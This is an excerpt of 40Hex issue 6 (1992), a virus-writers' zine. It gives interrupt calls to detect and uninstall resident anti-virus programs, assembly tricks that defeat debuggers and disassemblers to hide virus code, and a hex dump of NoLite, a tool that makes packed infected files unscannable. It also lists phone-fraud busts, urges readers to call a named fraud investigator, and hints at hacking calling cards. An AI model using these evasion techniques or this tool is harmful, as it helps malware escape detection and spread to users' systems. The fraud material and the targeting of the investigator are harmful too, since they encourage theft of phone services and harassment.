2554 lines
119 KiB
Plaintext
2554 lines
119 KiB
Plaintext
![]() |
40Hex Number 6 Volume 2 Issue 2 File 000
|
|||
|
|
|||
|
|
|||
|
Welcome to 40Hex issue 6. If this is your first time reading an issue of
|
|||
|
40 Hex, I welcome you, but recommend that you start with an earlier issue.
|
|||
|
This issue will have a Virus Spotlite on Creeping Death(Dir-2). It isn't in
|
|||
|
the normal Hex Dump format, and it is fully commented.
|
|||
|
|
|||
|
- Landfill is temporarily down(again!). This is due to several [NuKEd]
|
|||
|
hard drive controllers... we are down but NOT out. Hopefully we should be
|
|||
|
up within several weeks of the release of this issue. Hellraiser is still
|
|||
|
unable to edit the magazine, hopefully next issue he will be back in
|
|||
|
charge.
|
|||
|
|
|||
|
- I think we must discuss one problem. Recently, we have been verbally
|
|||
|
"attacked" by some lamers in the virus scene who like to jerk off on
|
|||
|
Fidonet. To clear up the issue at hand, we personally don't use all of
|
|||
|
the methods found in the articles. For example, we don't sit around all
|
|||
|
day and PKLite infected files and then remove the PKLite header. We let
|
|||
|
you people do it. As a matter of fact, we made it a hell of a lot easier
|
|||
|
due to this month's article called NoLite. No self-respecting virus
|
|||
|
group would do it. Not everyone that reads this magazine is a virus
|
|||
|
programmer, but wants to learn. Ya gotta start somewhere. Another person
|
|||
|
who has been insulting us on FidoNet is Sara Gordon. I do not know the
|
|||
|
whole story behind her hatred, but I know it stems from a phone
|
|||
|
conversation between her and Hellraiser. From what I understand, they
|
|||
|
disagreed on many topics, and HR may have gotten insulting (I don't
|
|||
|
know the whole story)
|
|||
|
|
|||
|
- Anyone that would like to submit articles feel free to do so, as long as
|
|||
|
what you write is not stolen from another source and is of good quality.
|
|||
|
If you would like to write articles contact any PHALCON/SKISM member or
|
|||
|
upload them to either Digital Warfare or PHUN LINE.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
40 Hex Mag Issue 6
|
|||
|
April 1992
|
|||
|
|
|||
|
The Contents
|
|||
|
|
|||
|
File 000.............................You Are Here
|
|||
|
File 001.............................Finding anti-viral programs in memory
|
|||
|
File 002.............................Code Concealing: Part I
|
|||
|
File 003.............................More Busts and Updates
|
|||
|
File 004.............................The NoLite Utility
|
|||
|
File 005.............................PHALCON/SKISM Update
|
|||
|
File 006.............................Some Dick who wants to bust virus authors
|
|||
|
File 007.............................The Kennedy Virus
|
|||
|
File 008.............................Cornell students nailed for viruses
|
|||
|
File 009.............................The Truth Behind Virus Scanners
|
|||
|
File 00A.............................Virus Spotlite-Dir2 Full commented source
|
|||
|
File 00B.............................Scan strings, and how to avoid them
|
|||
|
File 00C.............................!Virus Contest!
|
|||
|
|
|||
|
Our Members: Axiom Codex(*)-(Sysop of PHUNLINE)
|
|||
|
Count Zero(*)-(Hacker, Amiga Programmer, Master of 150#)
|
|||
|
CRoW MeiSTeR(K)-(Sysop of Crow Tech., Goob)
|
|||
|
Dark Angel-(Programmer, Master Chef)
|
|||
|
DecimatoR(*)-(Sysop of Digital Warfare, Programmer)
|
|||
|
Demogorgon-(Hacker, Programmer)
|
|||
|
Garbageheap-(Fearless Leader, Sysop of LandFill, Programmer)
|
|||
|
Hellraiser-(Fearless Leader, Programmer)
|
|||
|
Instigator(*)-(Terry Oakes' butt-buddy, 40 Hex writer)
|
|||
|
Joshua Tower-(Electronics, MonkeyWrenching)
|
|||
|
Lazarus Long-(Programmer)
|
|||
|
Night Crawler-(Courier, Keeper of All Virii)
|
|||
|
Orion Rogue-(Rouge?, named us, then laid back, and relied on name)
|
|||
|
Paragon Dude-(Macintosh Progammer(lonely))
|
|||
|
Renegade(*?)-(Hacker, Macintosh Programmer)
|
|||
|
Time Lord(*)-(Sysop of USSR Systems)
|
|||
|
|
|||
|
(*)-Denotes persons who should avoid bending over for the soap,
|
|||
|
and invest in large quantities of KY Jelly.
|
|||
|
(K)-Denotes persons who should get KY Jelly anyway.
|
|||
|
(*?)-Denotes persons who came too close, and wisely backed off
|
|||
|
and also saved a fortune on KY Jelly.
|
|||
|
|
|||
|
Special Goodbye's to:Piff'(Sorry ya had to quit)
|
|||
|
|
|||
|
Greets to: Attitude Adjuster, Dekion, Loki, [NuKE], Suicidal Maniac, and our
|
|||
|
readers (do we have any?!?!?)
|
|||
|
|
|||
|
P.S. The transcript of the Alliance mentioned in last issue will NOT be
|
|||
|
released in this issue. This issue is just too damned packed to add another
|
|||
|
large file. It will be put into 40Hex-7, if we aren't in jail.
|
|||
|
|
|||
|
|
|||
|
-)GHeap
|
|||
|
40Hex Number 6 Volume 2 Issue 2 File 001
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
Memory Resident Anti-Virus Detection
|
|||
|
and Removal
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
Here is a list of ways to see if anti-viral utils are present in memory.
|
|||
|
I got the list out of PC interupts, a book by Ralph Brown. Here they are:
|
|||
|
|
|||
|
F.-DRIVER.SYS (Part of the F-Protect virus package by Fridrik Skulason.)
|
|||
|
This program "grabs" the INT 21 monitoring code, if it was not
|
|||
|
already taken by another program.
|
|||
|
INT 21h, Function 4Bh, Sub Function EEh
|
|||
|
AX must = 4BEEh at call, and call returns AX=1234h if F-Prot
|
|||
|
sucessfully grabbed INT 21, and AX=2345h if the grab failed.
|
|||
|
|
|||
|
F-DLOCK.SYS (A HD access restrictor, part of F-Protect Package)
|
|||
|
Call INT 2Fh, Funct. 46h, SubFunct 53h
|
|||
|
At call, AX must = 4653h, CX=0005h, BX= 0000h
|
|||
|
If present in ram, AX will return FFFFh. To uninstall, call
|
|||
|
with AX & CX the same as above, but BX= 0001h. AX, ES, & BX
|
|||
|
will be destroyed.
|
|||
|
|
|||
|
F-LOCK.EXE (Part of F-Protect package, looks for "suspicious" activity)
|
|||
|
INT 2Fh, Funct 46h, SubFunct. 53h
|
|||
|
To call: AX = 4653h, CX=0002h, BX=0000h (installation check)
|
|||
|
BX=0001h (uninstall)
|
|||
|
BX=0002h (disable v1.08 & below)
|
|||
|
BX=0003h (enable v1.08 & below)
|
|||
|
Call returns AX=FFFFh if installed ( BX=0000h at call)
|
|||
|
AX, BX, and ES destroyed, if uninstalled (BX=0001 at call)
|
|||
|
|
|||
|
F-POPUP.EXE (Pop up menu for F-Protect)
|
|||
|
INT 2Fh, Funct. 46h, SubFunct. 53h
|
|||
|
To call: AX=4653h, CX=0004h, BX= 0000h, 0001h or 0002h
|
|||
|
(See above - BX same as F-Lock)
|
|||
|
Returns: Same as F-LOCK.EXE
|
|||
|
|
|||
|
F-XCHK.EXE (Prevents execution of any progs which don't have self-checking
|
|||
|
code added by F-XLOCK)
|
|||
|
INT 2Fh, Funct. 46h, SubFunct 53h
|
|||
|
To Call: Registers = same as F-Popup, except CX=0003h, and
|
|||
|
BX = 0000h (installation check) or 0001h (uninstall)
|
|||
|
Returns: same as F-LOCK, above.
|
|||
|
|
|||
|
TBSCANX (Resident Virus scanning Util by Frans Veldman)
|
|||
|
INT 2Fh, Function CAh, SubFunct 00h
|
|||
|
Call: AX=CA01, BX=5442h ("TB")
|
|||
|
Returns: AL=00h if not installed, AL=FFh if installed
|
|||
|
BX=7462h ("tb") if BX was 5442h during call
|
|||
|
|
|||
|
INT 2Fh, Function CAh, Subfunction 02h (Set state of TBSCANX)
|
|||
|
Call: AX=CA02h, BL = new state (00h=disabled, 01h=enabled)
|
|||
|
|
|||
|
VDEFEND (Part of PC-tools. Works on v7.0)
|
|||
|
INT 21h, Function FAh
|
|||
|
To call: AH=FAh, DX=5945h, AL=subfunction (01h to uninstall)
|
|||
|
returns: CF set on error, DI = 4559h (?)
|
|||
|
|
|||
|
DATAMON (PC Tools 7.0 file protection)
|
|||
|
INT 2Fh, Funct 62h, Sub Funct 84h
|
|||
|
Call: AX=6284h, BX=0000h (for installation check), CX=0000h
|
|||
|
Returns: AX=resident code segment, BX & CX = 5555h
|
|||
|
|
|||
|
Flu Shot, or Virex PC
|
|||
|
INT 21h
|
|||
|
Call: AX=0ff0fh
|
|||
|
Returns if either is installed: AX=101h
|
|||
|
|
|||
|
If anyone has any more Anti-Viral IDs, post 'em on Digital Warfare and I'll
|
|||
|
update this list.
|
|||
|
|
|||
|
---DecimatoR PHALCON/SKISM
|
|||
|
40HEX_6_002 SEGMENT PUBLIC 'code'
|
|||
|
ORG 100H
|
|||
|
ASSUME CS:CODE,DS:CODE,SS:CODE,ES:CODE
|
|||
|
|
|||
|
;******************************************************************************
|
|||
|
|
|||
|
Concealment: Keep Your Code Hidden From Prying Eyes
|
|||
|
by Demogorgon/PHALCON/SKISM
|
|||
|
|
|||
|
|
|||
|
Recently, I have been experimenting with a few new programming techniques
|
|||
|
that should be of great interest to the virus writing community. It is always
|
|||
|
our top priority to keep our code out of the hands of lamers in order to
|
|||
|
prevent the dreaded 'text change' and above all, to cause the anti-virus
|
|||
|
community as much grief as possible. In order to do this, we must put a great
|
|||
|
deal of effort into concealing our code. That is the focus of this article.
|
|||
|
|
|||
|
This file is divided into two parts. The first part is devoted to developing
|
|||
|
'debug resistant' code, and the second part deals with defeating disassemblers.
|
|||
|
I will not cover encryption, because methods of encryption are commonly known
|
|||
|
and there is really not much further I can go with that. For a complete review
|
|||
|
of self encryption methods, take a look at Dark Angel's Funky Virus Writing
|
|||
|
Guide (number three, the one that hasn't been released yet.)
|
|||
|
|
|||
|
Part_I: The debugger is NOT your friend
|
|||
|
|
|||
|
The basic idea behind writing debug ressistant code is finding a way to
|
|||
|
make your code behave differently when it runs under a debugger. With a real
|
|||
|
mode debugger, this is simplicity itself. All that is necessary is a little
|
|||
|
knowledge of how a debugger works. A debugger, such as debug or TD traces
|
|||
|
through a program by setting handlers to int 1 and int 3. These are called
|
|||
|
after every instruction is executed. A virus that wishes to avoid being
|
|||
|
debugged can simply replace the handlers for these interrupts, and the results
|
|||
|
will be just about whatever you want. Here is some code to do this:
|
|||
|
|
|||
|
eat_debug:
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov dx, offset eat_int
|
|||
|
mov ax,2501h
|
|||
|
int 21h
|
|||
|
mov al,03h
|
|||
|
int 21h
|
|||
|
... ; rest of code
|
|||
|
eat_int: iret
|
|||
|
|
|||
|
As you can see, this requires minimal space in your code, and is certainly
|
|||
|
worth the effort. You can experiment by placing something else at 'eat_int'.
|
|||
|
Another commonly used tactic is to disable the keyboard interrupt while certain
|
|||
|
parts of the code are being executed. This will surely keep lamers baffled,
|
|||
|
though a pro would recognize what was going on immediately. I am sure McAfee's
|
|||
|
programmer's scoff at code such as this. Also note that while this will defeat
|
|||
|
the average real mode debugger, any protected mode debugger will step through
|
|||
|
this as if it weren't there. Playing with interrupts will not help you when
|
|||
|
your program will be running in a virtual cpu anyway. One method I found which
|
|||
|
will work nicely against td386 is to throw in a hlt instruction. This will
|
|||
|
give TD an exception 13 error, and terminate the program. Anyone who is aware
|
|||
|
of this will just step over a hlt instruction, so therefore methods must be
|
|||
|
used to conceal its presence, or to make it a necessary part of the code. This
|
|||
|
will be covered in part II.
|
|||
|
Another trick you can play is to call int3 within your program. If
|
|||
|
someone tries to run your program under a debugger, it will stop each time int3
|
|||
|
is called. It is possible to trace through it, but it will be annoying if
|
|||
|
there are many int3's thrown in.
|
|||
|
|
|||
|
Part_2: Kill your disassembler
|
|||
|
|
|||
|
No matter how well you mess up debuggers, your program is entirely at the
|
|||
|
mercy of a programmer armed with a good disassembler. Unless, of course, you
|
|||
|
use techniques that will confuse disassemblers. My favorite method for
|
|||
|
baffling them is to create code that overlaps. Overlapping code may seem a
|
|||
|
little bit too complicated for most of us at first, but with the knowledge of a
|
|||
|
few instruction hex translations, you too can make effective overlapping code
|
|||
|
without sacrificing too much code size. Overlapping code can get as complex as
|
|||
|
you would like, but this file will only deal with the simplest examples.
|
|||
|
|
|||
|
|
|||
|
eat_sr: mov ax,02EBh
|
|||
|
jmp $-2 ; huh?
|
|||
|
... ; rest of code
|
|||
|
|
|||
|
This may confuse you at first, but it is fairly simple. The first instruction
|
|||
|
moves a dummy value into ax. The second instruction jmps into the value that
|
|||
|
was just moved into ax. '02EB' translates into 'jmp $+2' (remember that words
|
|||
|
are stored in reverse). This jump goes past the first jmp, and continues on
|
|||
|
with the code. This will probably not be sufficient to defeat a good
|
|||
|
disassembler like Sourcer, but it does demonstrate the technique. The problem
|
|||
|
with this is that Sourcer may or may not just pick up the code after commenting
|
|||
|
out the 'jmp $-2'. It is difficult to predict how Sourcer will respond, and it
|
|||
|
usually depends on the bytes that appear directly after the jmp. To severely
|
|||
|
baffle Sourcer, it is necessary to do some stranger things. Take a look at
|
|||
|
this example.
|
|||
|
|
|||
|
erp: mov ax,0FE05h
|
|||
|
jmp $-2h
|
|||
|
add ah,03Bh
|
|||
|
... ; rest of code
|
|||
|
|
|||
|
This code is quite a bit more useful than the previous listing. Let us
|
|||
|
simulate what would happen if we were to trace through this code, showing a hex
|
|||
|
dump at each step to clarify things.
|
|||
|
|
|||
|
B8 05 FE EB FC 80 C4 3B mov ax,0FE05h ; ax=FE05h
|
|||
|
^^ ^^ ^^
|
|||
|
B8 05 FE EB FC 80 C4 3B jmp $-2 ; jmp into '05 FE'
|
|||
|
^^ ^^
|
|||
|
B8 05 FE EB FC 80 C4 3B add ax,0EBFEh ; 05 is 'add ax'
|
|||
|
^^ ^^ ^^
|
|||
|
B8 05 FE EB FC 80 C4 3B cld ; a dummy instruction
|
|||
|
^^
|
|||
|
B8 05 FE EB FC 80 C4 3B add ah,3Bh ; ax=2503h
|
|||
|
^^ ^^ ^^
|
|||
|
|
|||
|
The add ah,03Bh is there simply to put the value 2503h into ax. By adding
|
|||
|
five bytes (as opposed to simply using 'mov ax,2503h') this code will confuse
|
|||
|
disassemblers pretty well. Even if the instructions are disassembled properly,
|
|||
|
the value of ax will not be known, so every int call after this point will not
|
|||
|
be commented properly, as long as you never move a value into ax. You can
|
|||
|
conceal the value from the disassembler by using 'add ax' or 'sub ax' whenever
|
|||
|
possible.
|
|||
|
If you examine this closely, you can see that any value can be put into
|
|||
|
ax. Two of the values can be changed to whatever you want, namely the FE in
|
|||
|
the first line, and the 3B in the last line. It is helpful to debug through
|
|||
|
this chunk of code to determine what values should be placed here in order to
|
|||
|
make ax what you would like it to be.
|
|||
|
Back to the subject of killing debuggers, it is very sneaky to hide
|
|||
|
something like a hlt instruction inside another instruction, such as a jmp.
|
|||
|
For example, take a look at this:
|
|||
|
|
|||
|
glurb: mov cx,09EBh
|
|||
|
mov ax,0FE05h ;-\
|
|||
|
jmp $-2 ; >--this should look familiar to you
|
|||
|
add ah,03Bh ;-/
|
|||
|
jmp $-10
|
|||
|
... ; rest of code
|
|||
|
|
|||
|
The three lines in the middle are a repeat of the previous example. The
|
|||
|
important part of this code is the first line and the 'jmp $-10'. What happens
|
|||
|
is, the jmp goes back into the 'mov cx' instruction. The '09EB' translates
|
|||
|
into 'jmp $+9'. This lands in the '$-10' part of the first jmp. The $-10 just
|
|||
|
happens to be stored as 0F4h, the hlt instruction. By making the hlt part of
|
|||
|
another instruction, it is not visible when it is being traced through by
|
|||
|
td386. It is also not possible to remove it without altering the code.
|
|||
|
|
|||
|
The purpose of this article is not to supply code to be thrown into your
|
|||
|
own programs. The purpose is to get you to think about new ways to avoid
|
|||
|
having your code looked at and modified by others. The most important thing is
|
|||
|
to be original. It is pointless for you to simply duplicate this code, because
|
|||
|
anyone else who has read this file will already know what you are trying to do.
|
|||
|
|
|||
|
code ENDS
|
|||
|
END concealment
|
|||
|
40Hex Number 6 Volume 2 Issue 2 File 003
|
|||
|
|
|||
|
|
|||
|
Well, there have been plenty of busts in 1992 so here is the run down
|
|||
|
to the best of my knowledge for anyone who is interested:
|
|||
|
|
|||
|
Asphi: Busted by MCI on January 20 for hacking on 476's. Had to pay $2700 for
|
|||
|
the phone calls he made. From what I found out MCI Wants to nail him to
|
|||
|
the wall. Charges include: Unlawful use of a computer, Credit Card
|
|||
|
Fraud, Theft of Services, Criminal Conspiracy and some more I can't
|
|||
|
think of, 10 or so total. And of course they took his system. He is
|
|||
|
going to have a trial, but a date has not yet been set.
|
|||
|
|
|||
|
Axiom Codex: Billed $2000 for equal access codes.
|
|||
|
|
|||
|
Cold Steel: Billed $40.00 for 476's
|
|||
|
|
|||
|
Count Zero: Yet another that got nailed for 476's. Billed $86.63 and had to
|
|||
|
tell his parents.
|
|||
|
|
|||
|
Deathblade: Billed $100 for 476's.
|
|||
|
|
|||
|
Dekion: Also nailed for 476's. Not sure if he will be charged. Billed
|
|||
|
somewhere between $100 - $1000.
|
|||
|
|
|||
|
Genghas Khan: Nailed for CBI and for 733's. Not sure about what will happen
|
|||
|
to him, but I heared from his friend that he is really screwed.
|
|||
|
|
|||
|
Instigator: I got nailed in the 476 ring too. They took my system but gave
|
|||
|
it back. I got billed for $1970.17. I got charged with 1 count
|
|||
|
of Theft of services. They dropped the other 8 charges. I am
|
|||
|
going to be on informal probation for a short period.
|
|||
|
|
|||
|
Marauder: Raided last year by GBI, they took his computer equipment and
|
|||
|
never gave it back. They finally decided to charge him with
|
|||
|
some misdemeanors.
|
|||
|
|
|||
|
Netrunner: Billed $100 for 476's.
|
|||
|
|
|||
|
Terminal: Arrested same time as Genghas Kahnvict. He is NOT a minor...
|
|||
|
|
|||
|
VenoM: 476's again. Billed $75.00 and had to tell his parents.
|
|||
|
|
|||
|
|
|||
|
*** AND the LAMEST bust of the month award goes to:
|
|||
|
|
|||
|
DecimatoR - for sitting in his car along a main road while using the beige box!
|
|||
|
He ran up a wopping $0.81 phone bill before the cop came by and asked him
|
|||
|
if he was having car trouble and saw the wires running from the car into the
|
|||
|
telephone pole. He was arrested, then released. No charges have been filed....
|
|||
|
yet!
|
|||
|
|
|||
|
|
|||
|
*** AND the second LAMEST bust of the month award goes to:
|
|||
|
|
|||
|
Hot Rize - for wizely running his neighbors phone line into his own house. No
|
|||
|
one would notice that one, eh? We also recieved confirmed reports that he is a
|
|||
|
dweeb.
|
|||
|
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
|
|||
|
All 4 PHALCON/SKISM joints went down between January and March. The Landfill
|
|||
|
for security reasons, Digital Warfare because of me getting busted, PHUN LINE
|
|||
|
for security reasons, and USSR because Time Lord may be getting busted.
|
|||
|
Digital Warfare went back up though, with DecimatoR as sysop.
|
|||
|
|
|||
|
** Apparently the head of the 476 operations is Terry Oakes. He is the phone
|
|||
|
Fraud investigator in charge of the TeleConnect Investigations. Give him a
|
|||
|
ring at 800-476-1234 Ext. 3045. Thank you.
|
|||
|
|
|||
|
** References to 476's are refering to 800-476-9696 owned by Teleconnect, a
|
|||
|
subsidary of MCI. (6 Digit Calling Cards - Get a LAMER to hack 'em)
|
|||
|
|
|||
|
** Make sure you change your passwords if you use the same one on Digital
|
|||
|
Warfare as you do on other boards. They have the OLD user list.
|
|||
|
|
|||
|
** Additions to the list will be on a first busted first added basis.
|
|||
|
|
|||
|
|
|||
|
-Instigator
|
|||
|
40Hex Number 6 Volume 2 Issue 2 File 004
|
|||
|
|
|||
|
NOLITE v1.0
|
|||
|
By DecimatoR
|
|||
|
of PHALCON/SKISM
|
|||
|
PD War Collection Program 1
|
|||
|
|
|||
|
This program will remove the PKLITE header from .EXE and .COM for
|
|||
|
two reasons.
|
|||
|
|
|||
|
A) To make the file un-decompressable, which dosen't mean much if
|
|||
|
you have the registered version of PKLITE.
|
|||
|
|
|||
|
B) More importantly, makes the PKLITEd file unscannable to virus
|
|||
|
scanners, such as McAfees' Virus Scan etc...
|
|||
|
|
|||
|
Does this by overwriting the header with random text from memory.
|
|||
|
|
|||
|
Parameters are simple:
|
|||
|
|
|||
|
NOLITE filename.ext (Extension MUST be included!)
|
|||
|
|
|||
|
Will remove the header from PKLITEd files. It will not remove the
|
|||
|
header if it is not a genuine PKLITE file.
|
|||
|
|
|||
|
Note: This program is based on PKSMASH, which was written by Hellraiser.
|
|||
|
Unfortunately, a bug surfaced in that program, which caused it
|
|||
|
to lock up sometimes. So I wrote this to replace PKSMASH, and
|
|||
|
stole HR's dox. <sorry dude>
|
|||
|
|
|||
|
---DecimatoR
|
|||
|
|
|||
|
Cut out the following code, call it NOLITE.HEX, then DEBUG < NOLITE.HEX
|
|||
|
|
|||
|
------------- Rip here ---------- Slice here ---------- Mince Here ----------
|
|||
|
|
|||
|
n nolite.com
|
|||
|
e 0100 4D 5A 53 00 03 00 00 00 09 00 FB 00 FF FF 46 00
|
|||
|
e 0110 00 04 00 00 00 01 F0 FF 50 00 00 00 03 01 9A 07
|
|||
|
e 0120 8A 15 20 83 C4 06 B8 0D 00 50 B8 01 00 50 9A 2F
|
|||
|
e 0130 89 15 20 83 C4 04 C7 06 38 6B 00 00 8B E5 5D C3
|
|||
|
e 0140 55 8B EC 83 EC 02 FF 36 16 35 E8 C4 19 83 C4 00
|
|||
|
e 0150 7A 01 03 00 01 00 20 00 09 00 FF FF 00 00 00 00
|
|||
|
e 0160 00 00 00 01 00 00 3E 00 00 00 01 00 FB 30 6A 72
|
|||
|
e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
|||
|
e 0190 B8 38 01 BA 3D 00 8C DB 03 D8 3B 1E 02 00 73 1D
|
|||
|
e 01A0 83 EB 20 FA 8E D3 BC 00 02 FB 83 EB 19 8E C3 53
|
|||
|
e 01B0 B9 C3 00 33 FF 57 BE 48 01 FC F3 A5 CB B4 09 BA
|
|||
|
e 01C0 36 01 CD 21 CD 20 4E 6F 74 20 65 6E 6F 75 67 68
|
|||
|
e 01D0 20 6D 65 6D 6F 72 79 24 FD 8C DB 53 83 C3 2D 03
|
|||
|
e 01E0 DA BE FE FF 8B FE 8C CD 8B C5 2B EA 8B CA D1 E1
|
|||
|
e 01F0 D1 E1 D1 E1 80 EC 10 80 EF 10 8E C0 8E DB F3 A5
|
|||
|
e 0200 FC 8E DD 07 06 BF 00 01 33 F6 AD 95 BA 10 00 EB
|
|||
|
e 0210 2C 90 AD 95 B2 10 EB 35 AD 95 B2 10 EB 36 AD 95
|
|||
|
e 0220 B2 10 EB 3B AD 95 B2 10 EB 5D AD 95 B2 10 EB 5E
|
|||
|
e 0230 AD 95 B2 10 EB 5F AD 95 B2 10 72 08 A4 D1 ED 4A
|
|||
|
e 0240 74 F4 73 F8 33 C9 33 DB D1 ED 4A 74 C5 D1 D3 D1
|
|||
|
e 0250 ED 4A 74 C4 D1 D3 85 DB 74 17 D1 ED 4A 74 BF D1
|
|||
|
e 0260 D3 80 FB 06 72 0B D1 ED 4A 75 04 AD 95 B2 10 D1
|
|||
|
e 0270 D3 2E 8A 8F 5E 01 80 F9 0A 74 74 33 DB 83 F9 02
|
|||
|
e 0280 74 2A D1 ED 4A 74 9D 72 23 D1 ED 4A 74 9C D1 D3
|
|||
|
e 0290 D1 ED 4A 74 9B D1 D3 D1 ED 4A 75 04 AD 95 B2 10
|
|||
|
e 02A0 D1 D3 80 FB 02 73 15 2E 8A BF 6E 01 AC 8A D8 56
|
|||
|
e 02B0 8B F7 2B F3 FA F3 26 A4 FB 5E EB 81 D1 ED 4A 75
|
|||
|
e 02C0 04 AD 95 B2 10 D1 D3 80 FB 08 72 DB D1 ED 4A 75
|
|||
|
e 02D0 04 AD 95 B2 10 D1 D3 80 FB 17 72 CB D1 ED 4A 75
|
|||
|
e 02E0 04 AD 95 B2 10 D1 D3 81 E3 DF 00 86 DF EB BD AC
|
|||
|
e 02F0 02 C8 80 D5 00 3C FF 75 82 5B 8B EB 83 C3 10 33
|
|||
|
e 0300 C0 AC 91 E3 0E AD 03 C3 8E C0 AD 97 26 01 1D E2
|
|||
|
e 0310 F9 EB EC AD 03 C3 FA 8E D0 AD 8B E0 FB AD 03 D8
|
|||
|
e 0320 53 AD 50 8E C5 8E DD 33 C0 8B D8 8B C8 8B D0 8B
|
|||
|
e 0330 E8 8B F0 8B F8 CB 03 00 02 0A 04 05 00 00 00 00
|
|||
|
e 0340 00 00 06 07 08 09 01 02 00 00 03 04 05 06 00 00
|
|||
|
e 0350 00 00 00 00 00 00 07 08 09 0A 0B 0C 0D 00 00 00
|
|||
|
e 0360 3A 00 00 F5 01 B8 23 00 8E C0 E8 CF 00 E8 00 00
|
|||
|
e 0370 C7 00 83 FA 01 B4 09 BA 5C 00 CD 21 74 0A BA 87
|
|||
|
e 0380 55 00 00 0C 09 E9 07 01 33 C9 E8 E7 40 01 00 8B
|
|||
|
e 0390 D7 B0 02 B4 3D 10 73 03 E9 EE 00 28 40 A3 0C 00
|
|||
|
e 03A0 B9 39 51 59 41 83 F9 64 75 39 15 2A CB 2A DD 12
|
|||
|
e 03B0 8B 09 A5 1E 1A 01 00 BA 0E 12 3F 28 50 12 80 3E
|
|||
|
e 03C0 08 50 75 D9 B9 0B B6 52 11 0F 11 BE 07 BF 49 81
|
|||
|
e 03D0 38 10 F3 A6 3A 00 74 0C 5A 52 52 8A 5C B0 1A 42
|
|||
|
e 03E0 1A EB B3 A2 6A 0A 33 D2 0A 0E 16 95 43 10 59 49
|
|||
|
e 03F0 30 27 5B 35 0D B4 40 58 31 91 24 0F 16 5A 0F 72
|
|||
|
e 0400 6E A5 1F 35 49 01 09 16 B4 3E 3D 00 40 64 90 8A
|
|||
|
e 0410 04 3C 20 74 06 3C 09 74 02 3C 0D C3 01 40 27 4A
|
|||
|
e 0420 01 C3 32 ED 8A 0E 80 00 41 BE 81 01 00 73 4C 01
|
|||
|
e 0430 E8 DE FF 75 03 46 E2 F8 51 E3 03 00 A4 FC F3 A4
|
|||
|
e 0440 06 1F 59 33 DB E3 0F BE 18 C6 02 85 18 04 C6 04
|
|||
|
e 0450 00 43 1C F4 89 1E 29 A1 36 C0 2E E3 0C 3B 0E 00
|
|||
|
e 0460 B0 0C 73 06 FC AE 75 FD E2 FB C3 BA FD 21 01 E0
|
|||
|
e 0470 B4 4C A0 0B 7E 00 4B 4C 49 54 45 A0 01 20 43 6F
|
|||
|
e 0480 70 72 2E 47 8B 0D 0A 36 00 4E 4F 5F 28 63 29 20
|
|||
|
e 0490 31 39 39 32 20 00 00 44 65 63 69 6D 61 74 6F 52
|
|||
|
e 04A0 20 50 48 41 4C 43 4F 00 00 4E 2F 53 4B 49 53 4D
|
|||
|
e 04B0 0D 24 0A 20 20 52 65 6D 6F 70 42 76 65 73 20 50
|
|||
|
e 04C0 93 73 69 67 6E 01 14 2A 75 72 65 20 66 72 6F 6D
|
|||
|
e 04D0 05 69 A5 0A 6C 1C 2E 52 28 55 73 DC 66 65 3A 20
|
|||
|
e 04E0 59 3C 17 A1 4C 27 6D 65 3E 1A 24 1D 3A 05 4E 6F
|
|||
|
e 04F0 08 40 77 61 55 66 6F 75 00 00 6E 64 20 2D 20 6E
|
|||
|
e 0500 6F 74 68 69 6E 67 20 64 6F 6E 36 25 65 07 32 45
|
|||
|
e 0510 72 5F 72 4B A1 1A 2C 74 81 70 74 20 A0 E0 28 73
|
|||
|
e 0520 75 63 63 6C 73 66 75 6C 74 7A 22 53 10 21 AB A4
|
|||
|
e 0530 5A 40 4E 72 C6 69 AA 52 44 48 19 74 A0 01 40 79
|
|||
|
e 0540 65 64 21 24 FF 01 00 00 01 01 00 00 00 00 00 00
|
|||
|
e 0550 00 00 01 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
|
|||
|
rcx
|
|||
|
055F
|
|||
|
w
|
|||
|
q
|
|||
|
|
|||
|
------------- Rip here ---------- Slice here ---------- Mince Here ----------
|
|||
|
40Hex Number 6 Volume 2 Issue 2 File 005
|
|||
|
|
|||
|
|
|||
|
I'm back, well kind of. Anyways, a lot of people have been
|
|||
|
asking, "What's going on with the group?" The question should be, "What's going
|
|||
|
on with any group these days?" It seems to me that 1992 was the death of h/p,
|
|||
|
or at least the "ice age" of it. Everybody was either getting busted or
|
|||
|
quitting the scene. Oh well, what can I say about it. Our group has been
|
|||
|
having bad luck too. Five (now six) busted as well as other assorted bad
|
|||
|
things happening to members.
|
|||
|
|
|||
|
Anyways, what's going on with us, huh?. Well the reason you
|
|||
|
haven't heard much from us is because we haven't been releasing our new stuff
|
|||
|
to BBS systems ( BBS system sounds as redundant as PIN number, I know) because
|
|||
|
we have a strong feeling that members of such groups as the CVIA are logging on
|
|||
|
to h/p boards in the hope of snatching the latest viruses. Well not much you
|
|||
|
can do about it if you run a BBS, unless you personnally know everyone who calls
|
|||
|
your board. But come to think of it - what good does it prove to release your
|
|||
|
newest creation to the general public (of the h/p crowd) via BBS system? Isn't
|
|||
|
that the same principle as the warez puppy scene? I guess you all can do
|
|||
|
whatever turns you on but we kind of decided that it would be in our best
|
|||
|
interests to release our stuff to BBS's only after they have been detected by
|
|||
|
the popular scanners or until they are kind of old. Not to fear, 40-HEX and
|
|||
|
"Dark Angel Phunky Writing Guide" will still be on boards at the same rate as
|
|||
|
always.
|
|||
|
|
|||
|
As for all of you people bitching that no longer have sites
|
|||
|
and that we are dead, well your dead - wrong. The current sites are as follows
|
|||
|
(in no specific order) - Digital Warfare (yes it's back, at a new number
|
|||
|
however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's back),
|
|||
|
and the newest addition - Crow Technology. And as for us being dead yeah
|
|||
|
right.
|
|||
|
|
|||
|
** Note from DecimatoR:
|
|||
|
The U.S.S.R System recently went down, due to Time Lord getting into a little
|
|||
|
hot water. It WILL return however... we're just not sure when. **
|
|||
|
|
|||
|
** Note from GHeap:
|
|||
|
I am coming back, gimme mo' time!
|
|||
|
|
|||
|
So now with that out of the way, on the other news. Hmmm.....
|
|||
|
Michelangelo caused quite a scare there for a while. It was pretty cool
|
|||
|
to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new
|
|||
|
